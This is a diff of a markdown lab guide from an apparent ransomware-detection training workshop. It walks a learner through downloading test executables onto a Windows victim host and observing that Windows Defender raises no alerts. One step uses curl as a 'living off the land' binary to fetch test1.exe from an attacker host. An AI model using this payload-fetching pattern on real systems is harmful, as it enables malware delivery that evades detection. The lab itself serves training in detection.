Oofles/rsac21-ransom/LAB_FILES/detection.md

 ## Download the "evil" files.

-1. Switch to the "WIN-VICTIM-HOST-#" by pressing **ctrl+shift+alt**.
-2. Do some pre-flight checks, you can access all the required programs by clicking the search bar in the bottom left and typing their respective names.
+1. Do some pre-flight checks, you can access all the required programs by clicking the search bar in the bottom left and typing their respective names.
 When they appear in the start menu results, double click them.
-- Is a folder on the desktop called?
-(If not, launch a command prompt and run `git clone `)
+- Is a folder on the desktop called "rsac21-ransom" (If not, launch a command prompt and run `git clone `)
 - Is firefox installed?
 (If not, launch a command prompt and run `choco install firefox`)
-3. Open a command prompt.
+2. Open a command prompt by clicking the search icon in the bottom left and typing `cmd`.
+The
 4. Run the following command with my new favorite living off the land binary for dowloading remote files.
 `curl http://172.31.24.<last octet of your linux attack host>:8000/test1.exe -o test1.exe`
-5. Once you have this worked out, download all theo ther files you created on the linux attack host just changing the file names.
+5. Once you have this worked out, download all the files you created on the linux attack host just changing the file names.
+  - test1.exe
+  - test264.exe
+  - test332.exe
+  - test332-arg.exe
-6. This is your first detection example...no alerts from windows defender.
+7. This is your first detection example...no alerts from windows defender.

 ## What does virust total have to say about all this?